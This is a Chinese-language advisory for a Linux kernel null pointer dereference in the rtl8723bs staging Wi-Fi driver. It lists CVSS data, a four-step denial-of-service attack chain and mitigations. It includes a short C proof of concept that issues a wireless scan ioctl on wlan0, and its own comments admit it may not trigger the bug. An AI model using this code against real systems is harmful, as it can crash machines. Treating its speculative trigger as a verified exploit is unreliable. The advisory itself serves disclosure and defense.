CVE-2026-43159 CVSS 5.5 中危

CVE-2026-43159 Linux内核空指针解引用漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43159

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的staging: rtl8723bs驱动程序存在空指针解引用安全漏洞。在find_network函数的执行逻辑中，变量pwlan在未经过严格非空校验的情况下，被直接传递给rtw_free_network_nolock()函数进行调用。由于该函数后续会解引用pwlan指针，当其为NULL时将导致内核异常。本地攻击者可利用此缺陷造成系统崩溃或拒绝服务。

技术细节

该漏洞位于Linux内核的staging: rtl8723bs无线网卡驱动程序中，具体发生在find_network函数与rtw_free_network_nolock函数的交互过程中。由于代码逻辑缺陷，pwlan指针在某些异常执行路径下可能未被正确赋值而保持为NULL状态。然而，调用方并未在传递参数前检查该指针的有效性，直接将其传递给rtw_free_network_nolock()。该函数在执行过程中会尝试访问pwlan指向的内存结构体成员，从而触发空指针解引用错误。根据CVSS向量分析，此攻击需要本地访问权限（AV:L）和低权限（PR:L），且无需用户交互。成功利用该漏洞将导致内核崩溃（Kernel Panic），从而严重影响系统的可用性（A:H），但通常不会导致信息泄露或权限提升。攻击者可通过编写特定的本地程序，触发无线扫描或网络状态变更操作，进而命中存在漏洞的代码路径来实施攻击。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标系统上拥有本地低权限用户账号。

STEP 2

步骤2：触发驱动逻辑

攻击者执行特定的代码或系统调用，与staging: rtl8723bs驱动程序交互，触发扫描或网络查找功能。

STEP 3

步骤3：空指针解引用

在find_network函数执行期间，pwlan变量为NULL并被传递给rtw_free_network_nolock，导致内核解引用NULL指针。

STEP 4

步骤4：系统崩溃

内核产生异常（Kernel Panic），导致系统重启或服务不可用，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43159: Null pointer dereference in rtl8723bs
 * Triggering the vulnerability in find_network via local interaction.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <sys/ioctl.h>

int main() {
    int sock;
    struct iwreq wrq;

    // Create a socket for wireless operations
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket creation failed");
        return 1;
    }

    memset(&wrq, 0, sizeof(wrq));
    // Target the interface using the vulnerable driver (e.g., wlan0)
    strncpy(wrq.ifr_name, "wlan0", IFNAMSIZ);

    // Attempt to trigger the scan logic which calls find_network
    // This may lead to the NULL pointer dereference if conditions are met
    if (ioctl(sock, SIOCGIWSCAN, &wrq) < 0) {
        // Depending on system state, this might trigger the bug or fail normally
        perror("ioctl failed");
    }

    close(sock);
    printf("Exploit attempt finished. Check kernel logs for crashes.\n");
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议立即更新系统内核以修复该漏洞。对于无法立即更新的关键系统，可以暂时禁用受影响的rtl8723bs驱动程序，并限制非特权用户的本地访问权限，以降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表